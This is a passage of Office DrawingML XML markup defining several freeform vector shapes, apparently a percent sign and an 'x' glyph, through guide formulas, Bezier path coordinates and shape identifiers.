                    <a:pt x="163" y="21"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="88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1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3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6"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="171" y="191"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="150" y="191"/>
                    <a:pt x="141" y="191"/>
                    <a:pt x="141" y="202"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="141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0" name="Freeform 1056">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B422703-D2BD-40D6-AC06-FED2BF68CE5D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818312" y="727075"/>
              <a:ext cx="22225" cy="22225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1" name="Freeform 1057">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF8DB902-1B4F-46BE-A358-EFDBEB5E00CD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6886575" y="612775"/>
              <a:ext cx="85725" cy="152400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 79 w 223"/>
                <a:gd name="T1" fmla="*/ 64 h 390"/>
                <a:gd name="T2" fmla="*/ 39 w 223"/>
                <a:gd name="T3" fmla="*/ 0 h 390"/>
                <a:gd name="T4" fmla="*/ 0 w 223"/>
                <a:gd name="T5" fmla="*/ 63 h 390"/>
                <a:gd name="T6" fmla="*/ 39 w 223"/>
                <a:gd name="T7" fmla="*/ 127 h 390"/>
                <a:gd name="T8" fmla="*/ 79 w 223"/>
                <a:gd name="T9" fmla="*/ 64 h 390"/>
                <a:gd name="T10" fmla="*/ 197 w 223"/>
                <a:gd name="T11" fmla="*/ 13 h 390"/>
                <a:gd name="T12" fmla="*/ 184 w 223"/>
                <a:gd name="T13" fmla="*/ 0 h 390"/>
                <a:gd name="T14" fmla="*/ 170 w 223"/>
                <a:gd name="T15" fmla="*/ 13 h 390"/>
                <a:gd name="T16" fmla="*/ 29 w 223"/>
                <a:gd name="T17" fmla="*/ 368 h 390"/>
                <a:gd name="T18" fmla="*/ 26 w 223"/>
                <a:gd name="T19" fmla="*/ 377 h 390"/>
                <a:gd name="T20" fmla="*/ 39 w 223"/>
                <a:gd name="T21" fmla="*/ 390 h 390"/>
                <a:gd name="T22" fmla="*/ 51 w 223"/>
                <a:gd name="T23" fmla="*/ 382 h 390"/>
                <a:gd name="T24" fmla="*/ 194 w 223"/>
                <a:gd name="T25" fmla="*/ 22 h 390"/>
                <a:gd name="T26" fmla="*/ 197 w 223"/>
                <a:gd name="T27" fmla="*/ 13 h 390"/>
                <a:gd name="T28" fmla="*/ 223 w 223"/>
                <a:gd name="T29" fmla="*/ 327 h 390"/>
                <a:gd name="T30" fmla="*/ 184 w 223"/>
                <a:gd name="T31" fmla="*/ 263 h 390"/>
                <a:gd name="T32" fmla="*/ 144 w 223"/>
                <a:gd name="T33" fmla="*/ 327 h 390"/>
                <a:gd name="T34" fmla="*/ 184 w 223"/>
                <a:gd name="T35" fmla="*/ 390 h 390"/>
                <a:gd name="T36" fmla="*/ 223 w 223"/>
                <a:gd name="T37" fmla="*/ 327 h 390"/>
                <a:gd name="T38" fmla="*/ 61 w 223"/>
                <a:gd name="T39" fmla="*/ 63 h 390"/>
                <a:gd name="T40" fmla="*/ 39 w 223"/>
                <a:gd name="T41" fmla="*/ 105 h 390"/>
                <a:gd name="T42" fmla="*/ 18 w 223"/>
                <a:gd name="T43" fmla="*/ 63 h 390"/>
                <a:gd name="T44" fmla="*/ 39 w 223"/>
                <a:gd name="T45" fmla="*/ 22 h 390"/>
                <a:gd name="T46" fmla="*/ 61 w 223"/>
                <a:gd name="T47" fmla="*/ 63 h 390"/>
                <a:gd name="T48" fmla="*/ 205 w 223"/>
                <a:gd name="T49" fmla="*/ 327 h 390"/>
                <a:gd name="T50" fmla="*/ 184 w 223"/>
                <a:gd name="T51" fmla="*/ 368 h 390"/>
                <a:gd name="T52" fmla="*/ 163 w 223"/>
                <a:gd name="T53" fmla="*/ 327 h 390"/>
                <a:gd name="T54" fmla="*/ 184 w 223"/>
                <a:gd name="T55" fmla="*/ 285 h 390"/>
                <a:gd name="T56" fmla="*/ 205 w 223"/>
                <a:gd name="T57" fmla="*/ 32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" h="390">
                  <a:moveTo>
                    <a:pt x="79" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="27"/>
                    <a:pt x="62" y="0"/>
                    <a:pt x="39" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="0"/>
                    <a:pt x="0" y="28"/>
                    <a:pt x="0" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="100"/>
                    <a:pt x="17" y="127"/>
                    <a:pt x="39" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="127"/>
                    <a:pt x="79" y="99"/>
                    <a:pt x="79" y="64"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="197" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="6"/>
                    <a:pt x="191" y="0"/>
                    <a:pt x="184" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="0"/>
                    <a:pt x="172" y="8"/>
                    <a:pt x="170" y="13"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="29" y="368"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="372"/>
                    <a:pt x="26" y="375"/>
                    <a:pt x="26" y="377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="384"/>
                    <a:pt x="32" y="390"/>
                    <a:pt x="39" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="390"/>
                    <a:pt x="49" y="386"/>
                    <a:pt x="51" y="382"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="194" y="22"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="18"/>
                    <a:pt x="197" y="15"/>
                    <a:pt x="197" y="13"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="223" y="327"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="292"/>
                    <a:pt x="207" y="263"/>
                    <a:pt x="184" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="263"/>
                    <a:pt x="144" y="292"/>
                    <a:pt x="144" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="362"/>
                    <a:pt x="161" y="390"/>
                    <a:pt x="184" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="390"/>
                    <a:pt x="223" y="362"/>
                    <a:pt x="223" y="327"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="61" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="90"/>
                    <a:pt x="47" y="105"/>
                    <a:pt x="39" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="105"/>
                    <a:pt x="18" y="90"/>
                    <a:pt x="18" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="39"/>
                    <a:pt x="31" y="22"/>
                    <a:pt x="39" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="22"/>
                    <a:pt x="61" y="39"/>
                    <a:pt x="61" y="63"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="205" y="327"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="205" y="353"/>
                    <a:pt x="191" y="368"/>
                    <a:pt x="184" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="368"/>
                    <a:pt x="163" y="353"/>
                    <a:pt x="163" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="300"/>
                    <a:pt x="176" y="285"/>
                    <a:pt x="184" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="285"/>
                    <a:pt x="205" y="300"/>
                    <a:pt x="205" y="3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2" name="Freeform 1058">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{672C4E81-A243-4EEF-8B9F-97BE965EB0A4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985000" y="666750"/>
              <a:ext cx="88900" cy="82550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5 w 232"/>
                <a:gd name="T25" fmla="*/ 21 h 212"/>
                <a:gd name="T26" fmla="*/ 95 w 232"/>
                <a:gd name="T27" fmla="*/ 11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2 h 212"/>
                <a:gd name="T52" fmla="*/ 60 w 232"/>
                <a:gd name="T53" fmla="*/ 191 h 212"/>
                <a:gd name="T54" fmla="*/ 115 w 232"/>
                <a:gd name="T55" fmla="*/ 116 h 212"/>
                <a:gd name="T56" fmla="*/ 171 w 232"/>
                <a:gd name="T57" fmla="*/ 191 h 212"/>
                <a:gd name="T58" fmla="*/ 140 w 232"/>
                <a:gd name="T59" fmla="*/ 202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1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6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2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3" name="Freeform 1059">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50BAE7AA-2F10-4524-92EA-4D1B3637CACA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7119937" y="727075"/>
              <a:ext cx="20638" cy="22225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4" name="Freeform 1060">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E4C1D5E-3EB3-4D17-999C-7C87404201C7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186612" y="612775"/>
              <a:ext cx="85725" cy="152400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 79 w 223"/>
                <a:gd name="T1" fmla="*/ 64 h 390"/>
                <a:gd name="T2" fmla="*/ 39 w 223"/>
                <a:gd name="T3" fmla="*/ 0 h 390"/>
                <a:gd name="T4" fmla="*/ 0 w 223"/>
                <a:gd name="T5" fmla="*/ 63 h 390"/>
                <a:gd name="T6" fmla="*/ 39 w 223"/>
                <a:gd name="T7" fmla="*/ 127 h 390"/>
                <a:gd name="T8" fmla="*/ 79 w 223"/>
                <a:gd name="T9" fmla="*/ 64 h 390"/>
                <a:gd name="T10" fmla="*/ 196 w 223"/>
                <a:gd name="T11" fmla="*/ 13 h 390"/>
                <a:gd name="T12" fmla="*/ 184 w 223"/>
                <a:gd name="T13" fmla="*/ 0 h 390"/>
                <a:gd name="T14" fmla="*/ 170 w 223"/>
                <a:gd name="T15" fmla="*/ 13 h 390"/>
                <a:gd name="T16" fmla="*/ 29 w 223"/>
                <a:gd name="T17" fmla="*/ 368 h 390"/>
                <a:gd name="T18" fmla="*/ 26 w 223"/>
                <a:gd name="T19" fmla="*/ 377 h 390"/>
                <a:gd name="T20" fmla="*/ 39 w 223"/>
                <a:gd name="T21" fmla="*/ 390 h 390"/>
                <a:gd name="T22" fmla="*/ 51 w 223"/>
                <a:gd name="T23" fmla="*/ 382 h 390"/>
                <a:gd name="T24" fmla="*/ 193 w 223"/>
                <a:gd name="T25" fmla="*/ 22 h 390"/>
                <a:gd name="T26" fmla="*/ 196 w 223"/>
                <a:gd name="T27" fmla="*/ 13 h 390"/>
                <a:gd name="T28" fmla="*/ 223 w 223"/>
                <a:gd name="T29" fmla="*/ 327 h 390"/>
                <a:gd name="T30" fmla="*/ 184 w 223"/>
                <a:gd name="T31" fmla="*/ 263 h 390"/>
                <a:gd name="T32" fmla="*/ 144 w 223"/>
                <a:gd name="T33" fmla="*/ 327 h 390"/>
                <a:gd name="T34" fmla="*/ 184 w 223"/>
                <a:gd name="T35" fmla="*/ 390 h 390"/>
                <a:gd name="T36" fmla="*/ 223 w 223"/>
                <a:gd name="T37" fmla="*/ 327 h 390"/>
                <a:gd name="T38" fmla="*/ 60 w 223"/>
                <a:gd name="T39" fmla="*/ 63 h 390"/>
                <a:gd name="T40" fmla="*/ 39 w 223"/>
                <a:gd name="T41" fmla="*/ 105 h 390"/>
                <a:gd name="T42" fmla="*/ 18 w 223"/>
                <a:gd name="T43" fmla="*/ 63 h 390"/>
                <a:gd name="T44" fmla="*/ 39 w 223"/>
                <a:gd name="T45" fmla="*/ 22 h 390"/>
                <a:gd name="T46" fmla="*/ 60 w 223"/>
                <a:gd name="T47" fmla="*/ 63 h 390"/>
                <a:gd name="T48" fmla="*/ 204 w 223"/>
                <a:gd name="T49" fmla="*/ 327 h 390"/>
                <a:gd name="T50" fmla="*/ 184 w 223"/>
                <a:gd name="T51" fmla="*/ 368 h 390"/>
                <a:gd name="T52" fmla="*/ 162 w 223"/>
                <a:gd name="T53" fmla="*/ 327 h 390"/>
                <a:gd name="T54" fmla="*/ 184 w 223"/>
                <a:gd name="T55" fmla="*/ 285 h 390"/>
                <a:gd name="T56" fmla="*/ 204 w 223"/>
                <a:gd name="T57" fmla="*/ 32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" h="390">
                  <a:moveTo>
                    <a:pt x="79" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="27"/>
                    <a:pt x="62" y="0"/>
                    <a:pt x="39" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="16" y="0"/>
                    <a:pt x="0" y="28"/>
                    <a:pt x="0" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="100"/>
                    <a:pt x="16" y="127"/>
                    <a:pt x="39" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="62" y="127"/>
                    <a:pt x="79" y="99"/>
                    <a:pt x="79" y="64"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="196" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="6"/>
                    <a:pt x="191" y="0"/>
                    <a:pt x="184" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="0"/>
                    <a:pt x="172" y="8"/>
                    <a:pt x="170" y="13"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="29" y="368"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="372"/>
                    <a:pt x="26" y="375"/>
                    <a:pt x="26" y="377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="384"/>
                    <a:pt x="32" y="390"/>
                    <a:pt x="39" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="390"/>
                    <a:pt x="49" y="386"/>
                    <a:pt x="51" y="382"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="193" y="22"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="195" y="18"/>
                    <a:pt x="196" y="15"/>
                    <a:pt x="196" y="13"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="223" y="327"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="292"/>
                    <a:pt x="207" y="263"/>
                    <a:pt x="184" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="160" y="263"/>
                    <a:pt x="144" y="292"/>
                    <a:pt x="144" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="362"/>
                    <a:pt x="160" y="390"/>
                    <a:pt x="184" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="390"/>
                    <a:pt x="223" y="362"/>
                    <a:pt x="223" y="327"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="60" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="60" y="90"/>
                    <a:pt x="46" y="105"/>
                    <a:pt x="39" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="105"/>
                    <a:pt x="18" y="90"/>
                    <a:pt x="18" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="39"/>
                    <a:pt x="31" y="22"/>
                    <a:pt x="39" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="22"/>
                    <a:pt x="60" y="39"/>
                    <a:pt x="60" y="63"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="204" y="327"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="353"/>
                    <a:pt x="191" y="368"/>
                    <a:pt x="184" y="368"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="368"/>
                    <a:pt x="162" y="353"/>
                    <a:pt x="162" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="162" y="300"/>
                    <a:pt x="176" y="285"/>
                    <a:pt x="184" y="285"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="191" y="285"/>
                    <a:pt x="204" y="300"/>
                    <a:pt x="204" y="3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5" name="Freeform 1061">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0FD22FC5-2595-44D3-95A3-173D1DB46EE4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285037" y="666750"/>
              <a:ext cx="88900" cy="82550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 231 w 231"/>
                <a:gd name="T1" fmla="*/ 202 h 212"/>
                <a:gd name="T2" fmla="*/ 215 w 231"/>
                <a:gd name="T3" fmla="*/ 191 h 212"/>
                <a:gd name="T4" fmla="*/ 192 w 231"/>
                <a:gd name="T5" fmla="*/ 191 h 212"/>
                <a:gd name="T6" fmla="*/ 125 w 231"/>
                <a:gd name="T7" fmla="*/ 103 h 212"/>
                <a:gd name="T8" fmla="*/ 185 w 231"/>
                <a:gd name="T9" fmla="*/ 21 h 212"/>
                <a:gd name="T10" fmla="*/ 208 w 231"/>
                <a:gd name="T11" fmla="*/ 21 h 212"/>
                <a:gd name="T12" fmla="*/ 224 w 231"/>
                <a:gd name="T13" fmla="*/ 11 h 212"/>
                <a:gd name="T14" fmla="*/ 208 w 231"/>
                <a:gd name="T15" fmla="*/ 0 h 212"/>
                <a:gd name="T16" fmla="*/ 148 w 231"/>
                <a:gd name="T17" fmla="*/ 0 h 212"/>
                <a:gd name="T18" fmla="*/ 132 w 231"/>
                <a:gd name="T19" fmla="*/ 11 h 212"/>
                <a:gd name="T20" fmla="*/ 163 w 231"/>
                <a:gd name="T21" fmla="*/ 21 h 212"/>
                <a:gd name="T22" fmla="*/ 114 w 231"/>
                <a:gd name="T23" fmla="*/ 88 h 212"/>
                <a:gd name="T24" fmla="*/ 65 w 231"/>
                <a:gd name="T25" fmla="*/ 21 h 212"/>
                <a:gd name="T26" fmla="*/ 95 w 231"/>
                <a:gd name="T27" fmla="*/ 11 h 212"/>
                <a:gd name="T28" fmla="*/ 79 w 231"/>
                <a:gd name="T29" fmla="*/ 0 h 212"/>
                <a:gd name="T30" fmla="*/ 19 w 231"/>
                <a:gd name="T31" fmla="*/ 0 h 212"/>
                <a:gd name="T32" fmla="*/ 3 w 231"/>
                <a:gd name="T33" fmla="*/ 11 h 212"/>
                <a:gd name="T34" fmla="*/ 19 w 231"/>
                <a:gd name="T35" fmla="*/ 21 h 212"/>
                <a:gd name="T36" fmla="*/ 42 w 231"/>
                <a:gd name="T37" fmla="*/ 21 h 212"/>
                <a:gd name="T38" fmla="*/ 104 w 231"/>
                <a:gd name="T39" fmla="*/ 103 h 212"/>
                <a:gd name="T40" fmla="*/ 39 w 231"/>
                <a:gd name="T41" fmla="*/ 191 h 212"/>
                <a:gd name="T42" fmla="*/ 16 w 231"/>
                <a:gd name="T43" fmla="*/ 191 h 212"/>
                <a:gd name="T44" fmla="*/ 0 w 231"/>
                <a:gd name="T45" fmla="*/ 202 h 212"/>
                <a:gd name="T46" fmla="*/ 16 w 231"/>
                <a:gd name="T47" fmla="*/ 212 h 212"/>
                <a:gd name="T48" fmla="*/ 76 w 231"/>
                <a:gd name="T49" fmla="*/ 212 h 212"/>
                <a:gd name="T50" fmla="*/ 91 w 231"/>
                <a:gd name="T51" fmla="*/ 202 h 212"/>
                <a:gd name="T52" fmla="*/ 60 w 231"/>
                <a:gd name="T53" fmla="*/ 191 h 212"/>
                <a:gd name="T54" fmla="*/ 114 w 231"/>
                <a:gd name="T55" fmla="*/ 116 h 212"/>
                <a:gd name="T56" fmla="*/ 170 w 231"/>
                <a:gd name="T57" fmla="*/ 191 h 212"/>
                <a:gd name="T58" fmla="*/ 140 w 231"/>
                <a:gd name="T59" fmla="*/ 202 h 212"/>
                <a:gd name="T60" fmla="*/ 155 w 231"/>
                <a:gd name="T61" fmla="*/ 212 h 212"/>
                <a:gd name="T62" fmla="*/ 215 w 231"/>
                <a:gd name="T63" fmla="*/ 212 h 212"/>
                <a:gd name="T64" fmla="*/ 231 w 231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12">
                  <a:moveTo>
                    <a:pt x="231" y="202"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="231" y="191"/>
                    <a:pt x="221" y="191"/>
                    <a:pt x="215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3" y="21"/>
                    <a:pt x="224" y="21"/>
                    <a:pt x="224" y="11"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="224" y="0"/>
                    <a:pt x="213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1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8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1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2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6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2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5" y="212"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="220" y="212"/>
                    <a:pt x="231" y="212"/>
                    <a:pt x="231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6" name="Freeform 1062">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776CEBC3-66FD-4D8B-8FCB-D5786060F761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7419975" y="727075"/>
              <a:ext cx="20638" cy="22225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7" name="Freeform 1063">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A275AB9-8F7B-44BD-A2CB-F37AF46DD11D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486650" y="612775"/>
              <a:ext cx="85725" cy="152400"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 79 w 223"/>
                <a:gd name="T1" fmla="*/ 64 h 390"/>
                <a:gd name="T2" fmla="*/ 39 w 223"/>
                <a:gd name="T3" fmla="*/ 0 h 390"/>
                <a:gd name="T4" fmla="*/ 0 w 223"/>
                <a:gd name="T5" fmla="*/ 63 h 390"/>
                <a:gd name="T6" fmla="*/ 39 w 223"/>
                <a:gd name="T7" fmla="*/ 127 h 390"/>
                <a:gd name="T8" fmla="*/ 79 w 223"/>
                <a:gd name="T9" fmla="*/ 64 h 390"/>
                <a:gd name="T10" fmla="*/ 197 w 223"/>
                <a:gd name="T11" fmla="*/ 13 h 390"/>
                <a:gd name="T12" fmla="*/ 184 w 223"/>
                <a:gd name="T13" fmla="*/ 0 h 390"/>
                <a:gd name="T14" fmla="*/ 170 w 223"/>
                <a:gd name="T15" fmla="*/ 13 h 390"/>
                <a:gd name="T16" fmla="*/ 29 w 223"/>
                <a:gd name="T17" fmla="*/ 368 h 390"/>
                <a:gd name="T18" fmla="*/ 27 w 223"/>
                <a:gd name="T19" fmla="*/ 377 h 390"/>
                <a:gd name="T20" fmla="*/ 39 w 223"/>
                <a:gd name="T21" fmla="*/ 390 h 390"/>
                <a:gd name="T22" fmla="*/ 51 w 223"/>
                <a:gd name="T23" fmla="*/ 382 h 390"/>
                <a:gd name="T24" fmla="*/ 194 w 223"/>
                <a:gd name="T25" fmla="*/ 22 h 390"/>
                <a:gd name="T26" fmla="*/ 197 w 223"/>
                <a:gd name="T27" fmla="*/ 13 h 390"/>
                <a:gd name="T28" fmla="*/ 223 w 223"/>
                <a:gd name="T29" fmla="*/ 327 h 390"/>
                <a:gd name="T30" fmla="*/ 184 w 223"/>
                <a:gd name="T31" fmla="*/ 263 h 390"/>
                <a:gd name="T32" fmla="*/ 144 w 223"/>
                <a:gd name="T33" fmla="*/ 327 h 390"/>
                <a:gd name="T34" fmla="*/ 184 w 223"/>
                <a:gd name="T35" fmla="*/ 390 h 390"/>
                <a:gd name="T36" fmla="*/ 223 w 223"/>
                <a:gd name="T37" fmla="*/ 327 h 390"/>
                <a:gd name="T38" fmla="*/ 61 w 223"/>
                <a:gd name="T39" fmla="*/ 63 h 390"/>
                <a:gd name="T40" fmla="*/ 39 w 223"/>
                <a:gd name="T41" fmla="*/ 105 h 390"/>
                <a:gd name="T42" fmla="*/ 19 w 223"/>
                <a:gd name="T43" fmla="*/ 63 h 390"/>
                <a:gd name="T44" fmla="*/ 39 w 223"/>
                <a:gd name="T45" fmla="*/ 22 h 390"/>
                <a:gd name="T46" fmla="*/ 61 w 223"/>
                <a:gd name="T47" fmla="*/ 63 h 390"/>
                <a:gd name="T48" fmla="*/ 205 w 223"/>
                <a:gd name="T49" fmla="*/ 327 h 390"/>
                <a:gd name="T50" fmla="*/ 184 w 223"/>
                <a:gd name="T51" fmla="*/ 368 h 390"/>
                <a:gd name="T52" fmla="*/ 163 w 223"/>
                <a:gd name="T53" fmla="*/ 327 h 390"/>
                <a:gd name="T54" fmla="*/ 184 w 223"/>
                <a:gd name="T55" fmla="*/ 285 h 390"/>
                <a:gd name="T56" fmla="*/ 205 w 223"/>
                <a:gd name="T57" fmla="*/ 32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" h="390">
                  <a:moveTo>
                    <a:pt x="79" y="64"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="79" y="27"/>
                    <a:pt x="62" y="0"/>
                    <a:pt x="39" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="0"/>
                    <a:pt x="0" y="28"/>
                    <a:pt x="0" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="100"/>
                    <a:pt x="17" y="127"/>
                    <a:pt x="39" y="127"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="63" y="127"/>
                    <a:pt x="79" y="99"/>
                    <a:pt x="79" y="64"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="197" y="13"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="197" y="6"/>
                    <a:pt x="191" y="0"/>
                    <a:pt x="184" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="176" y="0"/>
                    <a:pt x="172" y="8"/>
                    <a:pt x="170" y="13"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="29" y="368"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="372"/>
                    <a:pt x="27" y="375"/>
                    <a:pt x="27" y="377"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="27" y="384"/>
                    <a:pt x="32" y="390"/>
                    <a:pt x="39" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="390"/>
                    <a:pt x="49" y="386"/>
                    <a:pt x="51" y="382"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="194" y="22"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="18"/>
                    <a:pt x="197" y="15"/>
                    <a:pt x="197" y="13"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="223" y="327"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="223" y="292"/>
                    <a:pt x="207" y="263"/>
                    <a:pt x="184" y="263"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="161" y="263"/>
                    <a:pt x="144" y="292"/>
                    <a:pt x="144" y="327"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="362"/>
                    <a:pt x="161" y="390"/>
                    <a:pt x="184" y="390"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="207" y="390"/>
                    <a:pt x="223" y="362"/>
                    <a:pt x="223" y="327"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="61" y="63"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="61" y="90"/>
                    <a:pt x="47" y="105"/>
                    <a:pt x="39" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="105"/>
                    <a:pt x="19" y="90"/>
                    <a:pt x="19" y="63"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="39"/>
                    <a:pt x="31" y="22"/>
                    <a:pt x="39" y="22"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="47" y="22"/>
                    <a:pt x="61" y="39"/>
                    <a:pt x="61" y="63"/>
                  </a:cubicBezTo>
                  <a:close/>
